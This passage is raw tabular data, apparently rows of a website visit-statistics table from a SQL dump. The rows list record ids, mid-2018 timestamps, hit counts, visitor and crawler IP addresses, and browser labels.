(263042,1530116509,1,1,0,0,'178.92.85.85','chrome'),(263043,1530116727,1,1,0,0,'54.36.149.67','other'),(263044,1530116807,1,1,0,0,'54.36.148.158','other'),(263045,1530116837,1,1,0,0,'66.249.70.25','chrome'),(263046,1530117016,1,1,0,0,'54.36.149.51','other'),(263047,1530117020,1,1,0,0,'54.36.148.33','other'),(263048,1530117106,1,1,0,0,'54.36.149.59','other'),(263049,1530117205,1,1,0,0,'141.8.142.74','other'),(263050,1530117226,1,1,0,0,'54.36.148.232','other'),(263051,1530117349,1,1,0,0,'54.36.148.103','other'),(263052,1530117380,1,1,0,0,'46.133.20.63','other'),(263053,1530117418,1,1,0,0,'54.36.149.37','other'),(263054,1530117525,1,1,0,0,'91.225.144.141','chrome'),(263055,1530117586,1,0,1,0,'66.249.64.30',''),(263056,1530117877,1,1,0,0,'91.196.178.130','chrome'),(263057,1530117990,1,1,0,0,'54.36.148.86','other'),(263058,1530118061,1,1,0,0,'178.92.85.85','chrome'),(263059,1530118177,1,1,0,0,'54.36.148.41','other'),(263060,1530118484,1,1,0,0,'54.36.148.234','other'),(263061,1530118621,1,1,0,0,'8.29.198.27','other'),(263062,1530118699,1,1,0,0,'40.77.167.159','other'),(263063,1530118778,1,1,0,0,'54.36.148.42','other'),(263064,1530118896,1,1,0,0,'54.36.149.80','other'),(263065,1530118939,1,1,0,0,'66.249.64.30','chrome'),(263066,1530119306,1,1,0,0,'141.8.132.19','other'),(263067,1530119356,2,2,0,0,'216.244.66.241','other'),(263068,1530119712,1,1,0,0,'54.36.148.129','other'),(263069,1530119963,1,1,0,0,'54.36.148.113','other'),(263070,1530120137,1,1,0,0,'54.36.149.51','other'),(263071,1530120316,4,4,0,0,'216.244.66.241','other'),(263072,1530120481,1,1,0,0,'54.36.148.143','other'),(263073,1530120525,1,1,0,0,'91.196.178.100','chrome'),(263074,1530120549,1,0,1,0,'66.249.64.30',''),(263075,1530120666,1,1,0,0,'54.36.148.216','other'),(263076,1530120853,1,1,0,0,'162.210.196.100','other'),(263077,1530121116,1,1,0,0,'54.36.148.222','other'),(263078,1530121121,1,1,0,0,'54.36.149.36','other'),(263079,1530121170,1,1,0,0,'54.36.148.199','other'),(263080,1530121295,2,2,0,0,'91.196.178.169','chrome'),(263081,1530121326,1,1,0,0,'54.36.148.205','other'),(263082,1530121444,1,1,0,0,'178.154.171.88','other'),(263083,1530121470,1,1,0,0,'54.36.148.113','other'),(263084,1530121768,1,1,0,0,'54.36.148.110','other'),(263085,1530121988,1,1,0,0,'54.36.149.51','other'),(263086,1530122112,1,1,0,0,'54.36.149.39','other'),(263087,1530122292,1,1,0,0,'54.36.148.115','other'),(263088,1530122309,1,1,0,0,'54.36.148.243','other'),(263089,1530122414,1,1,0,0,'54.36.148.59','other'),(263090,1530122622,1,1,0,0,'54.36.148.234','other'),(263091,1530122660,1,1,0,0,'54.36.149.70','other'),(263092,1530122666,1,1,0,0,'54.36.148.138','other'),(263093,1530122695,1,1,0,0,'54.36.148.126','other'),(263094,1530123149,1,1,0,0,'54.36.148.220','other'),(263095,1530123170,2,2,0,0,'216.244.66.241','other'),(263096,1530123211,1,1,0,0,'54.36.148.230','other'),(263097,1530123314,1,1,0,0,'54.36.148.103','other'),(263098,1530123377,1,1,0,0,'8.29.198.25','other'),(263099,1530123379,1,1,0,0,'92.112.105.243','chrome'),(263100,1530123584,1,1,0,0,'54.36.148.196','other'),(263101,1530123685,1,1,0,0,'141.8.142.74','other'),(263102,1530124031,1,1,0,0,'54.36.148.74','other'),(263103,1530124192,1,1,0,0,'54.36.148.123','other'),(263104,1530124408,1,1,0,0,'54.36.148.195','other'),(263105,1530124455,1,1,0,0,'54.36.148.76','other'),(263106,1530124472,1,1,0,0,'54.36.149.10','other'),(263107,1530124523,2,2,0,0,'167.114.1.124','other'),(263108,1530124543,1,1,0,0,'54.36.149.56','other'),(263109,1530124730,1,1,0,0,'91.209.11.236','other'),(263110,1530124776,1,1,0,0,'54.36.148.75','other'),(263111,1530124803,1,1,0,0,'54.36.148.85','other'),(263112,1530124823,1,1,0,0,'54.36.148.155','other'),(263113,1530124848,1,1,0,0,'54.36.148.13','other'),(263114,1530124913,1,1,0,0,'54.36.148.227','other'),(263115,1530125027,1,1,0,0,'54.36.148.21','other'),(263116,1530125163,1,1,0,0,'87.250.224.46','other'),(263117,1530125318,1,1,0,0,'54.36.148.158','other'),(263118,1530125444,1,1,0,0,'54.36.148.135','other'),(263119,1530125533,1,1,0,0,'54.36.149.96','other'),(263120,1530125914,1,1,0,0,'54.36.148.125','other'),(263121,1530126038,1,1,0,0,'216.244.66.241','other'),(263122,1530126072,1,1,0,0,'54.36.148.184','other'),(263123,1530126106,1,1,0,0,'54.36.148.17','other'),(263124,1530126141,1,1,0,0,'54.36.148.204','other'),(263125,1530126152,1,1,0,0,'54.36.148.210','other'),(263126,1530126336,1,1,0,0,'54.36.148.196','other'),(263127,1530126554,1,1,0,0,'54.36.149.74','other'),(263128,1530126562,1,1,0,0,'54.36.148.188','other'),(263129,1530126718,1,1,0,0,'54.36.148.133','other'),(263130,1530126816,1,1,0,0,'91.209.11.236','other'),(263131,1530126828,1,1,0,0,'46.133.191.187','chrome'),(263132,1530126950,1,1,0,0,'54.36.149.34','other'),(263133,1530127256,1,1,0,0,'54.36.148.37','other'),(263134,1530127428,1,1,0,0,'54.36.148.15','other'),(263135,1530127433,1,1,0,0,'141.8.132.19','other'),(263136,1530127726,1,1,0,0,'178.95.159.135','chrome'),(263137,1530127975,1,1,0,0,'13.66.205.121','other'),(263138,1530128117,1,1,0,0,'54.36.148.126','other'),(263139,1530128283,1,1,0,0,'54.36.149.24','other'),(263140,1530128342,2,2,0,0,'216.244.66.241','other'),(263141,1530128723,1,1,0,0,'95.163.255.99','other'),(263142,1530129032,1,1,0,0,'54.36.148.179','other'),(263143,1530129420,1,1,0,0,'54.36.148.78','other'),(263144,1530129477,1,1,0,0,'8.29.198.26','other'),(263145,1530129701,1,1,0,0,'178.154.171.88','other'),(263146,1530129793,1,1,0,0,'54.36.149.101','other'),(263147,1530130075,3,3,0,0,'157.55.39.143','other'),(263148,1530130079,3,3,0,0,'157.55.39.145','other'),(263149,1530130090,2,2,0,0,'157.55.39.67','other'),(263150,1530130238,1,1,0,0,'216.244.66.241','other'),(263151,1530130244,1,1,0,0,'54.36.149.0','other'),(263152,1530130416,1,0,1,0,'66.249.64.29',''),(263153,1530130466,1,1,0,0,'54.36.149.43','other'),(263154,1530130471,1,1,0,0,'91.196.178.93','chrome'),(263155,1530130572,1,1,0,0,'54.36.148.230','other'),(263156,1530130594,1,0,1,0,'66.249.64.30',''),(263157,1530130832,1,1,0,0,'141.8.142.74','other'),(263158,1530130970,1,1,0,0,'92.112.105.243','chrome'),(263159,1530131168,1,1,0,0,'178.140.213.210','msie'),(263160,1530131342,1,1,0,0,'54.36.148.193','other'),(263161,1530131385,1,1,0,0,'54.36.148.143','other'),(263162,1530131406,1,1,0,0,'54.36.148.189','other'),(263163,1530131462,1,1,0,0,'66.249.64.30','chrome'),(263164,1530131641,1,1,0,0,'54.36.148.167','other'),(263165,1530131833,1,1,0,0,'54.36.148.222','other'),(263166,1530131983,1,1,0,0,'54.36.149.11','other'),(263167,1530132024,1,1,0,0,'54.36.148.245','other'),(263168,1530132073,1,1,0,0,'54.36.148.180','other'),(263169,1530132080,1,1,0,0,'37.204.38.85','chrome'),(263170,1530132105,1,1,0,0,'54.36.148.95','other'),(263171,1530132135,1,1,0,0,'54.36.148.233','other'),(263172,1530132447,1,1,0,0,'54.36.148.190','other'),(263173,1530132569,2,2,0,0,'69.30.221.250','other'),(263174,1530132730,1,1,0,0,'54.36.149.75','other'),(263175,1530132848,1,1,0,0,'141.8.142.74','other'),(263176,1530132888,1,1,0,0,'54.36.148.125','other'),(263177,1530133000,2,0,2,0,'66.249.70.27',''),(263178,1530133056,1,1,0,0,'216.244.66.241','other'),(263179,1530133096,1,1,0,0,'54.36.148.121','other'),(263180,1530133156,1,1,0,0,'54.36.149.71','other'),(263181,1530133170,1,1,0,0,'54.36.148.112','other'),(263182,1530133409,1,0,1,0,'66.249.64.29',''),(263183,1530133485,1,1,0,0,'54.36.148.17','other'),(263184,1530133594,1,1,0,0,'54.36.149.20','other'),(263185,1530133695,2,2,0,0,'148.251.244.137','other'),(263186,1530133699,1,1,0,0,'66.249.70.25','chrome'),(263187,1530133740,1,1,0,0,'54.36.149.101','other'),(263188,1530133865,1,1,0,0,'54.36.149.34','other'),(263189,1530133918,1,1,0,0,'47.96.234.201','other'),(263190,1530134029,1,1,0,0,'54.36.148.34','other'),(263191,1530134202,1,1,0,0,'8.29.198.27','other'),(263192,1530134335,1,1,0,0,'54.36.148.221','other'),(263193,1530134746,1,0,1,0,'66.249.70.25',''),(263194,1530135201,1,1,0,0,'54.36.148.130','other'),(263195,1530135294,1,1,0,0,'54.36.149.54','other'),(263196,1530135637,1,1,0,0,'54.36.149.40','other'),(263197,1530135699,1,1,0,0,'54.36.148.232','other'),(263198,1530135731,1,1,0,0,'54.36.148.208','other'),(263199,1530135933,1,1,0,0,'54.36.148.194','other'),(263200,1530135939,1,1,0,0,'54.36.148.176','other'),(263201,1530136444,1,1,0,0,'54.36.149.99','other'),(263202,1530136518,1,1,0,0,'54.36.148.244','other'),(263203,1530136687,1,1,0,0,'54.36.148.210','other'),(263204,1530136688,1,1,0,0,'54.36.149.49','other'),(263205,1530136819,1,1,0,0,'54.36.149.81','other'),(263206,1530136990,1,1,0,0,'216.244.66.241','other'),(263207,1530137100,1,0,1,0,'66.249.70.29',''),(263208,1530137544,1,1,0,0,'46.147.181.215','msie'),(263209,1530137564,2,2,0,0,'54.36.149.14','other'),(263210,1530137592,1,1,0,0,'178.154.171.88','other'),(263211,1530137782,1,1,0,0,'54.36.149.31','other'),(263212,1530137792,3,3,0,0,'54.165.59.7','other'),(263213,1530138128,1,1,0,0,'54.36.148.226','other'),(263214,1530138233,1,1,0,0,'54.36.148.114','other'),(263215,1530138599,1,1,0,0,'54.36.148.205','other'),(263216,1530138910,1,1,0,0,'91.196.178.102','chrome'),(263217,1530138950,1,1,0,0,'54.36.148.19','other'),(263218,1530139114,1,0,1,0,'66.249.66.75',''),(263219,1530139155,2,2,0,0,'54.36.149.51','other'),(263220,1530139158,1,0,1,0,'66.249.66.76',''),(263221,1530139179,1,1,0,0,'54.36.149.47','other'),(263222,1530139249,1,1,0,0,'54.36.149.66','other'),(263223,1530139275,2,2,0,0,'69.30.198.202','other'),(263224,1530139366,3,3,0,0,'54.165.59.7','other'),(263225,1530139376,1,1,0,0,'54.36.148.41','other'),(263226,1530139407,1,1,0,0,'54.36.148.83','other'),(263227,1530139456,1,1,0,0,'66.249.66.156','chrome'),(263228,1530139574,1,1,0,0,'66.249.66.75','chrome'),(263229,1530139764,1,1,0,0,'47.97.209.38','other'),(263230,1530139981,1,1,0,0,'54.36.149.98','other'),(263231,1530140085,1,1,0,0,'54.36.149.35','other'),(263232,1530140153,1,1,0,0,'54.36.149.75','other'),(263233,1530140189,1,1,0,0,'54.36.148.250','other'),(263234,1530140261,1,1,0,0,'178.154.200.41','other'),(263235,1530140288,1,1,0,0,'54.36.148.185','other'),(263236,1530140319,1,1,0,0,'8.29.198.26','other'),(263237,1530140367,1,1,0,0,'54.36.148.183','other'),(263238,1530140378,1,1,0,0,'216.244.66.241','other'),(263239,1530140444,1,1,0,0,'95.163.255.114','other'),(263240,1530140509,1,1,0,0,'54.36.149.68','other'),(263241,1530140689,1,0,1,0,'66.249.66.156',''),(263242,1530140747,1,1,0,0,'54.36.148.25','other'),(263243,1530140869,1,1,0,0,'95.163.255.108','other'),(263244,1530140997,1,1,0,0,'54.36.148.241','other'),(263245,1530141089,1,1,0,0,'54.36.148.85','other'),(263246,1530141190,1,1,0,0,'54.36.148.255','other'),(263247,1530141212,1,1,0,0,'95.163.255.106','other'),(263248,1530141236,1,1,0,0,'87.250.224.46','other'),(263249,1530141421,1,1,0,0,'54.36.148.110','other'),(263250,1530141492,1,1,0,0,'178.154.171.88','other'),(263251,1530141496,1,1,0,0,'54.36.148.90','other'),(263252,1530141689,1,1,0,0,'54.36.149.32','other'),(263253,1530141963,1,1,0,0,'54.36.148.65','other'),(263254,1530142211,1,1,0,0,'54.36.148.137','other'),(263255,1530142217,1,1,0,0,'54.36.149.75','other'),(263256,1530142299,1,1,0,0,'180.76.15.13','other'),(263258,1530142307,1,1,0,0,'54.36.148.108','other'),(263259,1530142549,1,1,0,0,'54.36.149.105','other'),(263260,1530142845,1,1,0,0,'54.36.149.30','other'),(263261,1530142951,2,2,0,0,'216.244.66.241','other'),(263262,1530143395,1,1,0,0,'54.36.148.26','other'),(263263,1530143488,1,1,0,0,'54.36.148.29','other'),(263264,1530143540,1,1,0,0,'54.165.59.7','other'),(263265,1530143598,1,1,0,0,'54.36.148.255','other'),(263266,1530143614,1,1,0,0,'54.36.149.101','other'),(263267,1530143849,1,1,0,0,'54.36.148.209','other'),(263268,1530143879,1,1,0,0,'54.36.149.83','other'),(263269,1530143896,1,1,0,0,'157.55.39.145','other'),(263270,1530143911,1,1,0,0,'54.36.148.32','other'),(263271,1530144018,1,1,0,0,'54.36.148.240','other'),(263272,1530144080,1,1,0,0,'54.36.148.120','other'),(263273,1530144118,1,1,0,0,'54.36.148.131','other'),(263274,1530144230,1,1,0,0,'54.36.148.118','other'),(263275,1530144249,1,1,0,0,'178.95.159.135','chrome'),(263276,1530144465,1,1,0,0,'80.252.154.233','chrome'),(263277,1530144787,1,1,0,0,'66.249.66.156','chrome'),(263278,1530144874,1,1,0,0,'54.36.148.178','other'),(263279,1530144944,1,1,0,0,'178.154.171.88','other'),(263280,1530145028,1,1,0,0,'8.29.198.25','other'),(263281,1530145199,1,1,0,0,'54.36.148.59','other'),(263282,1530145430,1,1,0,0,'66.249.66.155','chrome'),(263283,1530145574,1,1,0,0,'54.36.149.15','other'),(263284,1530145832,1,1,0,0,'54.36.148.106','other'),(263285,1530145840,1,1,0,0,'54.36.149.42','other'),(263286,1530146007,1,1,0,0,'54.36.149.9','other'),(263287,1530146071,1,1,0,0,'54.36.149.73','other'),(263288,1530146157,1,1,0,0,'54.36.148.184','other'),(263289,1530146221,1,1,0,0,'54.36.148.165','other'),(263290,1530146262,1,1,0,0,'54.36.148.80','other'),(263291,1530146268,1,1,0,0,'54.36.149.86','other'),(263292,1530146319,1,1,0,0,'54.36.148.238','other'),(263293,1530146782,1,1,0,0,'54.36.148.137','other'),(263294,1530146808,1,1,0,0,'54.36.148.151','other'),(263295,1530147506,1,1,0,0,'54.36.148.253','other'),(263296,1530147509,1,1,0,0,'178.154.171.88','other'),(263297,1530147647,1,1,0,0,'54.36.148.198','other'),(263298,1530147651,1,1,0,0,'52.53.201.78','chrome'),(263299,1530148074,1,1,0,0,'66.249.66.75','chrome'),(263300,1530148111,2,2,0,0,'216.244.66.241','other'),(263301,1530148406,1,1,0,0,'54.36.148.134','other'),(263302,1530148499,1,1,0,0,'54.36.149.29','other'),(263303,1530148753,1,1,0,0,'54.36.148.255','other'),(263304,1530148767,33,33,0,0,'18.219.192.16','other'),(263305,1530148800,1,1,0,0,'54.36.148.92','other'),(263306,1530149202,1,1,0,0,'54.36.148.83','other'),(263307,1530149278,1,1,0,0,'54.36.148.15','other'),(263308,1530149681,2,2,0,0,'54.36.148.124','other'),(263309,1530149871,1,1,0,0,'180.76.15.25','other'),(263310,1530150032,1,1,0,0,'95.163.255.95','other'),(263311,1530150039,1,1,0,0,'178.154.171.88','other'),(263312,1530150293,1,1,0,0,'54.36.148.168','other'),(263313,1530150296,1,1,0,0,'54.36.148.127','other'),(263314,1530150378,1,1,0,0,'54.36.148.226','other'),(263315,1530150423,1,1,0,0,'66.249.66.156','chrome'),(263316,1530150429,1,1,0,0,'54.36.148.24','other'),(263317,1530150502,1,1,0,0,'54.36.148.32','other'),(263318,1530150527,1,1,0,0,'37.9.113.182','other'),(263319,1530150612,1,1,0,0,'54.36.148.20','other'),(263320,1530150720,1,1,0,0,'54.36.148.179','other'),(263321,1530150831,1,1,0,0,'54.36.148.71','other'),(263322,1530151008,1,1,0,0,'54.36.148.173','other'),(263323,1530151166,1,1,0,0,'8.29.198.25','other'),(263324,1530151220,1,1,0,0,'54.36.149.35','other'),(263325,1530151357,1,1,0,0,'54.36.148.51','other'),(263326,1530151460,1,1,0,0,'216.244.66.241','other'),(263327,1530151463,2,2,0,0,'54.36.149.7','other'),(263328,1530151539,1,1,0,0,'54.36.148.191','other'),(263329,1530152020,1,1,0,0,'54.36.148.86','other'),(263330,1530152079,2,2,0,0,'178.154.171.88','other'),(263331,1530152087,1,1,0,0,'54.36.148.22','other'),(263332,1530152238,1,1,0,0,'54.36.148.58','other'),(263333,1530152483,2,2,0,0,'216.244.66.241','other'),(263334,1530153165,1,1,0,0,'54.36.148.47','other'),(263335,1530153592,1,1,0,0,'54.36.149.34','other'),(263336,1530154000,2,2,0,0,'141.8.142.74','other'),(263337,1530154050,1,1,0,0,'54.36.149.107','other'),(263338,1530154051,1,1,0,0,'40.77.167.210','other'),(263339,1530154237,1,1,0,0,'54.36.149.45','other'),(263340,1530154253,1,1,0,0,'54.36.148.12','other'),(263341,1530154277,1,1,0,0,'54.36.148.97','other'),(263342,1530154392,1,1,0,0,'54.36.148.19','other'),(263343,1530154412,1,1,0,0,'54.36.149.50','other'),(263344,1530154515,1,1,0,0,'54.36.148.104','other'),(263345,1530154904,1,1,0,0,'87.250.224.46','other'),(263346,1530155015,1,1,0,0,'54.36.148.188','other'),(263347,1530155058,1,1,0,0,'54.36.148.219','other'),(263348,1530155341,1,1,0,0,'54.36.148.74','other'),(263349,1530155397,1,1,0,0,'141.8.142.74','other'),(263350,1530155404,1,1,0,0,'54.36.148.238','other'),(263351,1530155449,4,4,0,0,'216.244.66.241','other'),(263352,1530155494,1,1,0,0,'5.45.207.58','other'),(263353,1530155578,1,1,0,0,'54.36.148.175','other'),(263354,1530155745,1,1,0,0,'54.36.148.94','other'),(263355,1530155753,1,1,0,0,'54.36.149.39','other'),(263356,1530155837,1,1,0,0,'54.36.148.110','other'),(263357,1530155846,1,1,0,0,'8.29.198.27','other'),(263358,1530155855,1,1,0,0,'54.36.148.117','other'),(263359,1530155971,1,1,0,0,'54.36.148.159','other'),(263360,1530156182,1,1,0,0,'54.36.148.79','other'),(263361,1530156482,3,3,0,0,'216.244.66.241','other'),(263362,1530156549,1,1,0,0,'54.36.148.87','other'),(263363,1530156890,1,1,0,0,'66.249.66.74','chrome'),(263364,1530157112,1,1,0,0,'54.36.148.252','other'),(263365,1530157621,1,1,0,0,'54.36.148.20','other'),(263366,1530157838,1,1,0,0,'54.36.149.9','other'),(263367,1530157843,1,1,0,0,'54.36.148.113','other'),(263368,1530157950,1,1,0,0,'54.36.148.47','other'),(263369,1530158040,1,1,0,0,'45.33.72.115','firefox'),(263370,1530158281,1,1,0,0,'54.36.148.227','other'),(263371,1530158283,1,1,0,0,'54.36.149.30','other'),(263372,1530158483,1,1,0,0,'54.36.149.61','other'),(263373,1530158738,1,1,0,0,'95.181.179.64','chrome'),(263374,1530158770,1,1,0,0,'54.36.148.58','other'),(263375,1530158851,1,1,0,0,'54.36.148.71','other'),(263376,1530158887,1,1,0,0,'54.36.148.59','other'),(263377,1530158894,1,1,0,0,'216.244.66.241','other'),(263378,1530158961,1,1,0,0,'54.36.148.115','other'),(263379,1530159072,1,1,0,0,'54.36.149.50','other'),(263380,1530159439,1,1,0,0,'54.36.148.179','other'),(263381,1530159517,1,1,0,0,'54.36.149.33','other'),(263382,1530159761,1,1,0,0,'54.36.148.181','other'),(263383,1530159779,1,1,0,0,'54.36.148.174','other'),(263384,1530160506,1,1,0,0,'54.36.149.98','other'),(263385,1530161071,1,1,0,0,'54.36.148.86','other'),(263386,1530161608,20,20,0,0,'85.10.206.20','other'),(263387,1530161655,1,1,0,0,'54.36.148.144','other'),(263388,1530161678,1,1,0,0,'54.36.148.71','other'),(263389,1530162023,1,1,0,0,'54.36.148.79','other'),(263390,1530162033,1,1,0,0,'8.29.198.27','other'),(263391,1530162205,1,1,0,0,'54.36.149.94','other'),(263392,1530162367,1,1,0,0,'54.36.148.55','other'),(263393,1530162385,1,1,0,0,'141.8.142.74','other'),(263394,1530162523,1,1,0,0,'54.36.148.223','other'),(263395,1530162638,1,1,0,0,'54.36.148.50','other'),(263396,1530162783,1,1,0,0,'54.36.148.93','other'),(263397,1530162789,1,1,0,0,'54.36.148.65','other'),(263398,1530162875,1,1,0,0,'54.36.148.189','other'),(263399,1530163021,1,1,0,0,'54.36.148.75','other'),(263400,1530163227,1,1,0,0,'54.36.148.16','other'),(263401,1530163330,1,1,0,0,'54.36.149.18','other'),(263402,1530163444,1,1,0,0,'54.36.148.121','other'),(263403,1530163484,1,1,0,0,'54.36.148.127','other'),(263404,1530163493,1,1,0,0,'54.36.149.4','other'),(263405,1530163525,1,0,1,0,'66.249.66.156',''),(263406,1530163672,1,1,0,0,'66.249.66.156','chrome'),(263407,1530163844,1,1,0,0,'54.36.149.28','other'),(263408,1530163882,1,1,0,0,'207.46.13.161','other'),(263409,1530163993,1,1,0,0,'54.36.149.60','other'),(263410,1530164115,1,1,0,0,'54.36.148.162','other'),(263411,1530164235,2,2,0,0,'216.244.66.241','other'),(263412,1530164258,1,1,0,0,'54.36.149.98','other'),(263413,1530164343,1,1,0,0,'54.208.102.37','other'),(263414,1530164345,1,1,0,0,'107.21.1.8','other'),(263415,1530164372,1,1,0,0,'66.249.66.74','chrome'),(263416,1530164383,1,1,0,0,'54.36.148.42','other'),(263417,1530164449,1,1,0,0,'54.36.148.238','other'),(263418,1530164516,1,1,0,0,'54.36.148.165','other'),(263419,1530164544,1,1,0,0,'54.36.149.67','other'),(263420,1530164609,1,1,0,0,'54.36.148.159','other'),(263421,1530164611,1,1,0,0,'54.36.148.239','other'),(263422,1530164933,1,1,0,0,'54.36.148.124','other'),(263423,1530165966,1,1,0,0,'54.36.148.142','other'),(263424,1530166235,1,1,0,0,'54.36.148.39','other'),(263425,1530166248,2,2,0,0,'91.196.178.90','chrome'),(263426,1530166353,1,1,0,0,'54.36.148.69','other'),(263427,1530166371,1,1,0,0,'157.55.39.198','other'),(263428,1530166373,1,1,0,0,'54.36.148.10','other'),(263429,1530166653,1,1,0,0,'54.36.149.84','other'),(263430,1530166665,1,1,0,0,'8.29.198.27','other'),(263431,1530166705,4,4,0,0,'188.40.102.170','other'),(263432,1530166970,1,1,0,0,'54.36.148.15','other'),(263433,1530167000,1,1,0,0,'54.36.148.102','other'),(263434,1530167003,1,1,0,0,'54.36.148.44','other'),(263435,1530167324,1,1,0,0,'54.36.148.97','other'),(263436,1530167361,1,1,0,0,'54.36.148.11','other'),(263437,1530167462,1,1,0,0,'54.36.148.207','other'),(263438,1530167901,1,1,0,0,'54.36.148.93','other'),(263439,1530168309,1,1,0,0,'157.55.39.145','other'),(263440,1530168475,3,3,0,0,'178.92.85.85','chrome'),(263441,1530168591,1,1,0,0,'54.36.148.184','other'),(263442,1530168737,1,1,0,0,'54.36.148.63','other'),(263443,1530168854,2,2,0,0,'141.8.142.74','other'),(263444,1530168954,2,2,0,0,'216.244.66.241','other'),(263445,1530169209,1,1,0,0,'54.36.148.160','other'),(263446,1530169228,1,1,0,0,'54.36.148.84','other'),(263447,1530169787,1,1,0,0,'128.68.20.143','msie'),(263448,1530169979,1,1,0,0,'54.36.148.46','other'),(263449,1530170252,1,1,0,0,'54.36.148.208','other'),(263450,1530170329,1,1,0,0,'54.36.149.95','other'),(263451,1530170343,1,1,0,0,'54.36.149.18','other'),(263452,1530170501,1,1,0,0,'178.154.171.88','other'),(263453,1530170695,1,1,0,0,'54.36.148.230','other'),(263454,1530170899,1,1,0,0,'54.36.149.25','other'),(263455,1530171227,8,8,0,0,'188.40.102.170','other'),(263456,1530171263,1,1,0,0,'54.36.148.38','other'),(263457,1530171297,1,1,0,0,'54.36.149.32','other'),(263458,1530171376,2,2,0,0,'54.36.148.232','other'),(263459,1530171658,1,1,0,0,'54.36.149.39','other'),(263460,1530171692,1,1,0,0,'54.36.148.230','other'),(263461,1530171729,1,1,0,0,'66.249.66.156','chrome'),(263462,1530171876,1,1,0,0,'66.249.66.75','chrome'),(263463,1530172040,1,1,0,0,'54.36.149.72','other'),(263464,1530172151,8,8,0,0,'188.40.102.170','other'),(263465,1530172271,1,1,0,0,'87.250.224.46','other'),(263466,1530172305,1,0,1,0,'66.249.66.74',''),(263467,1530172484,1,1,0,0,'54.36.149.101','other'),(263468,1530172585,1,1,0,0,'77.37.192.101','chrome'),(263469,1530172658,1,1,0,0,'54.36.148.75','other'),(263470,1530172781,1,1,0,0,'54.36.148.217','other'),(263471,1530172894,1,1,0,0,'8.29.198.25','other'),(263472,1530173032,1,1,0,0,'54.36.149.64','other'),(263473,1530173038,1,1,0,0,'54.36.148.79','other'),(263474,1530173064,8,8,0,0,'188.40.102.170','other'),(263475,1530173390,4,4,0,0,'144.76.4.41','other'),(263476,1530173555,1,1,0,0,'54.36.148.208','other'),(263477,1530173851,1,1,0,0,'54.36.148.40','other'),(263478,1530173967,5,5,0,0,'188.40.102.170','other'),(263479,1530174264,1,1,0,0,'54.36.148.125','other'),(263480,1530174295,1,1,0,0,'54.36.148.62','other'),(263481,1530174452,1,0,1,0,'66.249.66.75',''),(263482,1530174509,1,1,0,0,'54.36.148.16','other'),(263483,1530174529,2,2,0,0,'46.105.124.55','firefox'),(263484,1530174836,1,1,0,0,'54.36.148.243','other'),(263485,1530174951,1,1,0,0,'54.36.148.78','other'),(263486,1530175100,1,1,0,0,'54.36.148.155','other'),(263487,1530175312,1,1,0,0,'54.36.148.36','other'),(263488,1530175344,1,1,0,0,'54.36.149.54','other'),(263489,1530175688,1,1,0,0,'54.36.148.157','other'),(263490,1530175802,1,1,0,0,'54.36.148.18','other'),(263491,1530175979,1,1,0,0,'216.244.66.241','other'),(263492,1530176092,1,1,0,0,'178.93.148.187','chrome'),(263493,1530176198,1,1,0,0,'54.36.149.62','other'),(263494,1530176242,1,1,0,0,'54.36.148.60','other'),(263495,1530176354,1,1,0,0,'54.36.148.69','other'),(263496,1530176498,1,1,0,0,'54.36.148.241','other'),(263497,1530176894,1,1,0,0,'54.36.149.1','other'),(263498,1530177038,1,1,0,0,'54.36.148.187','other'),(263499,1530177211,1,1,0,0,'37.115.125.195','chrome'),(263500,1530177247,1,1,0,0,'54.36.148.13','other'),(263501,1530177315,1,1,0,0,'54.36.148.236','other'),(263502,1530177408,1,1,0,0,'54.36.148.34','other'),(263503,1530177499,1,1,0,0,'8.29.198.25','other'),(263504,1530177588,1,1,0,0,'54.36.148.234','other'),(263505,1530177873,1,1,0,0,'54.36.149.37','other'),(263506,1530177938,1,1,0,0,'54.36.148.114','other'),(263507,1530178041,1,1,0,0,'54.36.148.94','other'),(263508,1530178142,1,1,0,0,'54.36.148.161','other'),(263509,1530178386,23,23,0,0,'207.46.13.137','other'),(263510,1530178411,12,12,0,0,'157.55.39.75','other'),(263511,1530178437,1,1,0,0,'54.36.149.66','other'),(263512,1530178563,1,1,0,0,'87.250.224.46','other'),(263513,1530178590,1,1,0,0,'141.8.142.74','other'),(263514,1530178679,1,0,1,0,'66.249.66.157',''),(263515,1530178818,1,1,0,0,'54.36.148.222','other'),(263516,1530178826,1,1,0,0,'54.36.148.169','other'),(263517,1530178830,1,1,0,0,'77.111.247.10','chrome'),(263518,1530178901,1,1,0,0,'54.36.148.114','other'),(263519,1530178961,1,1,0,0,'54.36.149.95','other'),(263520,1530179039,1,1,0,0,'54.36.149.99','other'),(263521,1530179120,1,1,0,0,'54.36.148.144','other'),(263522,1530179241,1,1,0,0,'54.36.148.212','other'),(263523,1530179410,1,1,0,0,'54.36.148.165','other'),(263524,1530179583,1,1,0,0,'54.36.148.50','other'),(263525,1530179637,1,1,0,0,'54.36.149.18','other'),(263526,1530179711,2,2,0,0,'141.8.142.74','other'),(263527,1530179756,1,1,0,0,'87.250.224.46','other'),(263528,1530179768,1,1,0,0,'54.36.148.214','other'),(263529,1530179973,2,2,0,0,'178.154.171.88','other'),(263530,1530180118,1,1,0,0,'54.36.148.176','other'),(263531,1530180189,1,0,1,0,'66.249.66.157',''),(263532,1530180353,1,1,0,0,'54.36.149.7','other'),(263533,1530181020,1,1,0,0,'54.36.148.51','other'),(263534,1530181195,1,1,0,0,'216.244.66.241','other'),(263535,1530181264,1,0,1,0,'66.249.66.156',''),(263536,1530181576,1,1,0,0,'54.36.148.150','other'),(263537,1530181849,1,1,0,0,'54.36.148.76','other'),(263538,1530181855,1,1,0,0,'54.36.148.173','other'),(263539,1530182120,1,1,0,0,'180.76.15.146','other'),(263540,1530182147,1,1,0,0,'54.36.149.96','other'),(263541,1530182464,1,1,0,0,'54.36.148.43','other'),(263542,1530182537,1,1,0,0,'54.36.148.188','other'),(263543,1530182587,1,1,0,0,'54.36.148.114','other'),(263544,1530182783,1,1,0,0,'66.249.66.156','chrome'),(263545,1530182790,1,1,0,0,'66.249.66.75','chrome'),(263546,1530183092,1,1,0,0,'54.36.149.79','other'),(263547,1530183153,1,1,0,0,'54.36.148.64','other'),(263548,1530183625,1,1,0,0,'54.36.148.37','other'),(263549,1530183699,1,1,0,0,'95.163.255.93','other'),(263550,1530183748,1,1,0,0,'8.29.198.25','other'),(263551,1530184001,2,2,0,0,'54.36.149.71','other'),(263552,1530184051,1,1,0,0,'54.36.148.44','other'),(263553,1530184084,1,1,0,0,'54.36.149.61','other'),(263554,1530184227,1,1,0,0,'54.36.149.31','other'),(263555,1530184241,1,1,0,0,'54.36.149.70','other'),(263556,1530184282,1,1,0,0,'54.36.148.54','other'),(263557,1530184299,1,1,0,0,'37.9.113.